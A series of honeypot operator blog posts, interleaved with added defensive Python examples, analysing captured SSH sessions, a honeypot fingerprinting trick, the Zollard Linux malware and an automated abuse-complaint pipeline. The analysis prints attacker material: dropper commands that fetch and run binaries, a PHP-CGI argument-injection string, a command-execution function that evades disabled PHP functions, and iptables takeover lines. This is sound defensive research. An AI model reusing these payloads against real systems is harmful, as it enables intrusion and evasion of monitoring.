Posts Tagged ‘Honeypots’

Honeypot detection

Wednesday, April 26th, 2017

My honeypots are sending out complaints on every single successful login.

Recently I saw the following logged entry in the complaint:

echo -en "\x31\x33\x33\x37"
cat /bin/ls

Now neither kippo nor cowrie as sshd honeypots have the file "/bin/ls" which could be looked at, so a 'cat /bin/ls' just results in a:

‘cat: /bin/ls: No such file or directory’

So this seems to be an easy and reliable way to test for a standard sshd honeypot..
No wonder that \x31\x33\x33\x37 just translates to "1337", which I interpret as a smiley left by the hacker ..


Friday, January 10th, 2014

I am not up to date..

Looking at I see not only BitCoin storage, but also  FeatherCoin, LiteCoin, MemeCoin, Terra; FreiCoin, LottoCoin and other stuff..

Whew.. I did not think that there are so many crypto currencies out there.

I found this because my honeypot captured a link to ( e66eb75f05328783c23745ef9d573de1 )

(I mentioned this program earlier (x86), but with a different md5-hash..)

Looking at the “x86” program one can find the installation of a miner for “MinCoins”, storing them at

I am wondering why not even one of the VirusTotal engines thinks that this is malware..


disknyp 3

Monday, December 16th, 2013

disknyp doesn’t seem to be a new thing..

In the paper:

(to be found at ) the download URL is already mentioned. Also clean-mx knows the file host, and on there is also a good look at these activities.

disknyp 2

Monday, December 16th, 2013

Meanwhile I captured 268 samples of disknyp.

Can be found on:

cool .. webserver on the ssh-port 🙂

The server answers with:

Content-Type: text/html
Content-Length: 4440
Accept-Ranges: bytes
Server: HFS 2.3 beta
Cache-Control: no-cache, no-store, must-revalidate, max-age=-1

Looks like the webserver running is from: beta271.exe

Also available for download on this webserver is a

svch.exe, probably an infector for Windows machines.

VirusTotal says only 24 of 48 antivirus vendors detect this:


MD5 9d37ef3a5388b1d3d67a8759f178dd2d
SHA1 c09437f9d2752fc8ded68429ac33392c846370fc
SHA256 5c7d2aa53e55977b1bd677d6a3415c7e9900769fc49e9e3bed1fd42d73f0381b
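Added example, not code from the original post: a banner check for "something that is not sshd on port 22", which is how the HFS server above gives itself away. It sends a minimal HTTP request and classifies the reply by its first bytes; a real sshd sends its "SSH-" banner before reading anything, an HTTP server only answers the request, so reading until close or timeout covers both. The sample reply is constructed from the header lines quoted above plus an assumed status line and body; the SSH banner string is likewise made up.

```python
import socket
import sys

def http_probe(host, port=22, timeout=5.0, limit=65536):
    """Connect, send a minimal HTTP request and return whatever the peer sends back."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(b"GET / HTTP/1.0\r\nHost: " + host.encode() + b"\r\n\r\n")
        buf = b""
        while len(buf) < limit:
            try:
                chunk = s.recv(4096)
            except socket.timeout:
                break          # sshd keeps the socket open but says nothing useful
            if not chunk:
                break          # peer closed (HTTP/1.0 servers do this after the body)
            buf += chunk
    return buf

def parse_headers(raw):
    """Split an HTTP response into (status line, {lower-case header name: value})."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("iso-8859-1", errors="replace")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers

def classify_reply(raw):
    """Return (protocol, software) judged from the first bytes a port sent back."""
    if raw.startswith(b"SSH-"):
        banner = raw.split(b"\r\n", 1)[0].split(b"\n", 1)[0]
        return "ssh", banner.decode("ascii", errors="replace")
    if raw.startswith(b"HTTP/"):
        _, headers = parse_headers(raw)
        return "http", headers.get("server", "")
    return "unknown", ""

def is_ssh_port_serving_http(raw):
    """The condition the post describes: a web server answering on the ssh port."""
    return classify_reply(raw)[0] == "http"

# Constructed reply: the header lines quoted above, with an assumed status line and body.
SAMPLE_HFS_REPLY = (b"HTTP/1.1 200 OK\r\n"
                    b"Content-Type: text/html\r\n"
                    b"Content-Length: 4440\r\n"
                    b"Accept-Ranges: bytes\r\n"
                    b"Server: HFS 2.3 beta\r\n"
                    b"Cache-Control: no-cache, no-store, must-revalidate, max-age=-1\r\n"
                    b"\r\n<html>...</html>")
# Constructed banner of an ordinary sshd, for comparison.
SAMPLE_SSH_BANNER = b"SSH-2.0-OpenSSH_5.9p1 Debian-5ubuntu1\r\n"

if __name__ == "__main__":
    host = sys.argv[1] if len(sys.argv) > 1 else None
    raw = http_probe(host) if host else SAMPLE_HFS_REPLY
    print(classify_reply(raw), "http-on-ssh-port:", is_ssh_port_serving_http(raw))
```

Run it with a host name to probe for real; without arguments it classifies the constructed sample. Probing a real sshd this way makes it log a protocol-mismatch and drop the connection, so do not point it at hosts you are not responsible for.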




Monday, December 2nd, 2013

Yesterday my ssh-honeypot captured 54 samples of “disknyp”.

All logins (probably automated) did the following:

**:~# rm -f disknyp
**:~# rm -f disknop
**:~# wget
--2013-12-01 03:58:03--
Connecting to… connected.
HTTP request sent, awaiting response… 503 ?????????
**:~# chmod 0777 disknyp
**:~# nohup /root/disknyp > /dev/null 2>&1 &
bash: nohup: command not found

The file is a 1491887-byte ELF 32-bit LSB executable. I don't know yet what it is doing..
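Added example, not code from the page: a small Python classifier that reads a session transcript in the "**:~# command" style quoted above and tags it either as a honeypot fingerprinting attempt (the echo -en "\x31\x33\x33\x37" / cat /bin/ls pair from the "Honeypot detection" post) or as a download-and-run dropper (the rm / wget / chmod / nohup chain in this post). Both transcripts are constructed: the disknyp one repeats this post's command lines with the download URL left out as on the page, the probe one is made up in the same style. The pattern lists and tag names are my own choices, not anything kippo or cowrie ship.

```python
import re

# Constructed transcript: this post's commands, download URL elided as on the page.
DISKNYP_TRANSCRIPT = """\
**:~# rm -f disknyp
**:~# rm -f disknop
**:~# wget
--2013-12-01 03:58:03--
Connecting to... connected.
HTTP request sent, awaiting response... 503
**:~# chmod 0777 disknyp
**:~# nohup /root/disknyp > /dev/null 2>&1 &
bash: nohup: command not found
"""

# Constructed transcript of the fingerprinting trick from the "Honeypot detection" post.
PROBE_TRANSCRIPT = r'''**:~# echo -en "\x31\x33\x33\x37"
1337
**:~# cat /bin/ls
cat: /bin/ls: No such file or directory
'''

PROMPT = re.compile(r"^\S*:~[#$]\s*(.*)$")

def extract_commands(transcript):
    """Keep only what was typed at the prompt; drop the command output lines."""
    cmds = []
    for line in transcript.splitlines():
        m = PROMPT.match(line)
        if m and m.group(1).strip():
            cmds.append(m.group(1).strip())
    return cmds

HEX_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")

def decode_echo_hex(cmd):
    """What an `echo -e` line made of \\xNN escapes would print (the canary the attacker expects)."""
    return bytes(int(h, 16) for h in HEX_ESCAPE.findall(cmd)).decode("latin-1")

# Tricks whose answer differs between a real shell and an emulated one.
PROBE_PATTERNS = [
    (re.compile(r"^cat\s+/(bin|sbin|usr/bin)/\S+"), "cat on a system binary the emulated fs cannot serve"),
    (re.compile(r"^echo\s+-[en]+\s+\S*(\\x[0-9a-fA-F]{2}){2,}"), "hex-escape canary via echo -e"),
]
# Stages of a fetch-and-run dropper, matched in order.
FETCH = re.compile(r"^(wget|curl|tftp|ftpget|scp)\b")
CHMOD = re.compile(r"^chmod\s+(\+x|[ugoa]*\+[rwx]+|[0-7]{3,4})\b")
EXEC = re.compile(r"^(nohup\s+\S+|\./\S+|(sh|bash|perl|python)\s+\S+)")

def classify(commands):
    """Tag a session 'honeypot-probe' and/or 'dropper', with the matching lines as evidence."""
    tags, evidence = set(), []
    for cmd in commands:
        for pat, why in PROBE_PATTERNS:
            if pat.search(cmd):
                tags.add("honeypot-probe")
                evidence.append((cmd, why))
    fetch_at = next((i for i, c in enumerate(commands) if FETCH.search(c)), None)
    if fetch_at is not None:
        for cmd in commands[fetch_at + 1:]:
            if CHMOD.search(cmd) or EXEC.search(cmd):
                tags.add("dropper")
                evidence.append((cmd, "fetch followed by chmod/exec"))
                break
    return {"tags": sorted(tags), "evidence": evidence}

if __name__ == "__main__":
    for name, text in (("disknyp", DISKNYP_TRANSCRIPT), ("probe", PROBE_TRANSCRIPT)):
        print(name, classify(extract_commands(text)))
```

The probe tag is the more interesting one operationally: a session that only runs the canary and leaves tells you the honeypot has been recognised and that IP will not come back with its real payload.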

linux binary

Tuesday, November 12th, 2013

Recently my nepenthes stopped working. Looking into the last log lines I found a wget line:

[12112013 06:25:07 debug info fixme] File info submitted (ebee4228eb3443cd

So I took a look at this binary, which I could download from this location.

# file x86
x86: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped

Next look: try "strings".

First nothing new.. but then I saw:

74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1
User-Agent: Zollard
Content-Type: application/x-www-form-urlencoded
Connection: close
$disablefunc = @ini_get("disable_functions");
if (!empty($disablefunc))
$disablefunc = str_replace(" ","",$disablefunc);
$disablefunc = explode(",",$disablefunc);

What the heck..? And who is “zollard”?


#### Update  ####

The POST part decodes to:

?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n



further on (strings drops lines shorter than four characters, so the lone braces of the original source are missing from its output; they are put back here):

$disablefunc = @ini_get("disable_functions");
if (!empty($disablefunc)) {
    $disablefunc = str_replace(" ", "", $disablefunc);
    $disablefunc = explode(",", $disablefunc);
}

function myshellexec($cmd)
{
    global $disablefunc;
    $result = "";
    if (!empty($cmd)) {
        // try every way of running a command until one is not disabled
        if (is_callable("exec") and !in_array("exec", $disablefunc)) {
            exec($cmd, $result);
            $result = join("\n", $result);
        }
        elseif (($result = `$cmd`) !== FALSE) {}
        elseif (is_callable("system") and !in_array("system", $disablefunc)) {
            $v = @ob_get_contents(); @ob_clean(); system($cmd);
            $result = @ob_get_contents(); @ob_clean(); echo $v;
        }
        elseif (is_callable("passthru") and !in_array("passthru", $disablefunc)) {
            $v = @ob_get_contents(); @ob_clean(); passthru($cmd);
            $result = @ob_get_contents(); @ob_clean(); echo $v;
        }
        elseif (is_resource($fp = popen($cmd, "r"))) {
            $result = "";
            while (!feof($fp)) { $result .= fread($fp, 1024); }
            pclose($fp);
        }
    }
    return $result;
}
myshellexec("wget -O /tmp/x86
myshellexec("chmod +x /tmp/x86");

Now the binary loads another binary, executes it and starts a webserver?

myshellexec(“wget -O /tmp/x86
myshellexec(“chmod +x /tmp/x86”);
HTTP/1.1 200 OK

A few lines more: it installs "iptables", drops every telnet connection and starts its own telnet daemon:

insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/ip_tables.ko
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/iptable_filter.ko
iptables -D INPUT -p tcp --dport 23 -j DROP
iptables -A INPUT -p tcp --dport 23 -j DROP

In the end the program destroys its sources (rm -rf) and runs in

mkdir -p

The last lines:

chmod +x
cp /bin/sh

So it ends up with some kind of crypto..

VirusTotal shows a hit rate of 2 out of 47; well, it is no Windows binary..

Anyone seen this before? Who is zollard? Where did the binary get the necessary root credentials from? I guess I have to take a further look..




There were quite a lot of download attempts today:

# grep gpharma nepenthes.log | wc -l

which comes from the log lines:

[12112013 09:23:43 debug info fixme] File info submitted (ebee4228eb3443cd8d55228733b8c1c6,
[12112013 09:23:43 debug info fixme] File upload requested (ebee4228eb3443cd8d55228733b8c1c6,


#### Update 2 ####


I executed the script on a Linux VMware VM after adding "o+x" rights to the binary.

The iptables lines generate errors:

error inserting … ip_tables.ko – Unknown symbol in module


Immediately the machine starts exchanging traffic with : 58455

and also starts listening on this port 58455.

Looks like my machine started scanning the IP range 117.201.16.* on that port;

I receive answers from there… No httpd or telnetd daemons are listening in "ps", which I expected.

The command "pstree" shows an httpd, though! Different children are running, the last one has a connection

to

Looks like the "ps" executable has been changed.
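The ps/pstree mismatch above is the classic symptom of a replaced ps binary: pstree builds its tree straight from /proc, so it still shows the httpd. Added example, not code from the post: a Python cross-check that lists /proc itself and diffs it against ps output, then describes any hidden PID from /proc alone. The sample snapshot is constructed (PID 4242 is the one the trojaned ps leaves out); live_check() runs the same comparison on the machine it is executed on. Caveat: this catches a swapped ps, or an LD_PRELOAD hook that only ps picks up, but a kernel rootkit hiding the /proc entries themselves, or a readdir hook loaded into every process (Python's os.listdir goes through libc too), hides from this script as well, so for anything that matters run the check from a statically linked tool or a clean boot medium.

```python
import os
import re
import subprocess

PS_PID = re.compile(r"^\s*(\d+)\b")

def pids_from_proc_listing(entries):
    """Numeric directory names under /proc are the kernel's own process list."""
    return {int(e) for e in entries if e.isdigit()}

def pids_from_ps_output(text):
    """PIDs from `ps -e` style output: first numeric column, header lines skipped."""
    pids = set()
    for line in text.splitlines():
        m = PS_PID.match(line)
        if m:
            pids.add(int(m.group(1)))
    return pids

def hidden_pids(proc_pids, ps_pids):
    """Processes the kernel knows about but ps did not list, in ascending order."""
    return sorted(proc_pids - ps_pids)

def describe(pid, proc_root="/proc"):
    """Best-effort name and command line for a PID, read from /proc without ps."""
    try:
        with open(f"{proc_root}/{pid}/comm") as f:
            comm = f.read().strip()
        with open(f"{proc_root}/{pid}/cmdline", "rb") as f:
            cmdline = f.read().replace(b"\0", b" ").decode(errors="replace").strip()
    except OSError:
        return f"{pid}: (gone or unreadable)"
    return f"{pid}: {comm} [{cmdline}]"

def live_check(proc_root="/proc"):
    """Run the comparison on this machine. /proc is re-checked afterwards so
    processes that exited between the two snapshots are not reported."""
    proc = pids_from_proc_listing(os.listdir(proc_root))
    out = subprocess.run(["ps", "-e", "-o", "pid="],
                         capture_output=True, text=True, check=True).stdout
    ps = pids_from_ps_output(out)
    return [p for p in hidden_pids(proc, ps) if os.path.isdir(f"{proc_root}/{p}")]

# Constructed snapshot: /proc holds PID 4242, which the trojaned ps left out.
SAMPLE_PROC_ENTRIES = ["1", "2", "1234", "4242", "self", "cpuinfo", "net"]
SAMPLE_PS_OUTPUT = """\
  PID TTY          TIME CMD
    1 ?        00:00:01 init
    2 ?        00:00:00 kthreadd
 1234 pts/0    00:00:00 bash
"""

if __name__ == "__main__":
    sample = hidden_pids(pids_from_proc_listing(SAMPLE_PROC_ENTRIES),
                         pids_from_ps_output(SAMPLE_PS_OUTPUT))
    print("sample snapshot, hidden from ps:", sample)
    for pid in live_check():
        print("hidden from ps on this host:", describe(pid))
```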

Will see what else can be found. Now it is "St. Martin" time.. :-)


good website

Thursday, September 27th, 2012

Found an interesting website dealing with malware-analysis:

Seems like a good source for information.

Tor exit node used for attack

Wednesday, March 21st, 2012

One recent reply to a kippo-attack complaint explained that the attacking IP is a Tor exit node.

Of course there is no way for us to find the real attacker when he/she is using Tor for making this attack. Sad that this important service is abused in this way.

The system you have identified ( / is an exit node on the Tor network. Tor is a distributed cryptographic anonymizing proxy service. The network traffic you detected was merely relayed through this system, and did not originate there. It is not possible to trace these connections back to their original source.

sshd complaints – update

Wednesday, March 14th, 2012

The automatic complaint mechanism is now active. An X-ARF complaint is generated
for each session where a successful login into the kippo honeypot produced some
recorded commands. The email address the complaint is sent to is determined
as always: check our own database, check the RIPE website and check abusix.
Here is an example of the second MIME part:

MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Type: text/plain; charset="utf8"; name="report.yaml"

Category: abuse
Report-Type: login-attack
Destination-System: kippo – sshd honeypot
User-Agent: PHREAK 1.3
Date: 2012-03-14 03:45:28
Service: sshd
Port: 22
Source: 89.129.**.** (obfuscated)
Source-Type: ipv4
Attachment: text/plain
Version: 1.0.1

and the third MIME-part looks like this:

MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Type: text/plain; charset="utf8"; name="command.txt"

recorded commands during this session:

uname -a
tar zxvf udp.tgz
rm -rf udp.tgz
chmod +x *
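Added example, not the author's code: building the three-part X-ARF complaint described above with Python's email package, from a session record like the one kippo would hand over. The keys in report.yaml follow the second MIME part shown above; the session record, the addresses and the "X-ARF: PLAIN" mail header (the marker the format uses for unsigned reports) are assumptions made for the example, and 192.0.2.10 is a documentation address, not a real attacker. A small per-recipient throttle stands in for the database check mentioned in the March 9 post below; it is in-memory only.

```python
from email.message import EmailMessage
from email.utils import formatdate

# Constructed session record in the shape the honeypot would hand us.
SESSION = {
    "source": "192.0.2.10",
    "date": "2012-03-14 03:45:28",
    "port": 22,
    "commands": ["uname -a", "tar zxvf udp.tgz", "rm -rf udp.tgz", "chmod +x *"],
}

def report_yaml(session):
    """Flat 'Key: value' YAML with the keys used in the second MIME part above."""
    fields = [
        ("Category", "abuse"),
        ("Report-Type", "login-attack"),
        ("Destination-System", "kippo - sshd honeypot"),
        ("User-Agent", "PHREAK 1.3"),
        ("Date", session["date"]),
        ("Service", "sshd"),
        ("Port", str(session["port"])),
        ("Source", session["source"]),
        ("Source-Type", "ipv4"),
        ("Attachment", "text/plain"),
        ("Version", "1.0.1"),
    ]
    return "".join(f"{k}: {v}\n" for k, v in fields)

def commands_txt(session):
    """Third part: the commands recorded during the session, one per line."""
    return ("recorded commands during this session:\n\n"
            + "".join(c + "\n" for c in session["commands"]))

def build_xarf_complaint(session, to_addr="abuse@example.net",
                         from_addr="honeypot@example.org"):
    """multipart/mixed with a human-readable text, report.yaml and command.txt."""
    msg = EmailMessage()
    msg["From"] = from_addr
    msg["To"] = to_addr
    msg["Date"] = formatdate(localtime=True)
    msg["Subject"] = f"abuse report about {session['source']} - {session['date']}"
    msg["X-ARF"] = "PLAIN"                      # assumed: unsigned X-ARF report marker
    msg.set_content(
        f"The host {session['source']} logged into our ssh honeypot on "
        f"{session['date']} UTC and ran the commands listed in the attached\n"
        "command.txt. Machine-readable details are in report.yaml.\n")
    # add_attachment turns the message into multipart/mixed and appends each part;
    # ASCII text gets Content-Transfer-Encoding 7bit and charset utf-8 automatically.
    msg.add_attachment(report_yaml(session), subtype="plain",
                       filename="report.yaml", params={"name": "report.yaml"})
    msg.add_attachment(commands_txt(session), subtype="plain",
                       filename="command.txt", params={"name": "command.txt"})
    return msg

def should_send(sent_counts, recipient, limit=3):
    """Cap complaints per abuse address; in production the counts live in a database."""
    if sent_counts.get(recipient, 0) >= limit:
        return False
    sent_counts[recipient] = sent_counts.get(recipient, 0) + 1
    return True

if __name__ == "__main__":
    print(build_xarf_complaint(SESSION).as_string())
```

Sending is deliberately left out: pass the message to smtplib (or your mail pipeline) only after should_send() agrees, so a noisy source does not turn the complaint stream into its own flood at the receiving abuse desk.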


Friday, March 9th, 2012

I am pretty close to starting to send out complaints
for successful sshd logins on my kippo honeypot.
The X-ARF part is ready. I decided to add the recorded
commands in the 3rd MIME part. The ttylog could also
be useful, but the receiver of the complaint is probably
not so interested in starting the playlog utility for
each complaint.
I still need to implement a database check so that receivers
only get a handful of complaints and are not overwhelmed by the
number of complaints..
Additionally the caught IPs will be added to our blacklist,
just like in the attacks caught by nepenthes.
Dionaea attacks will come next 🙂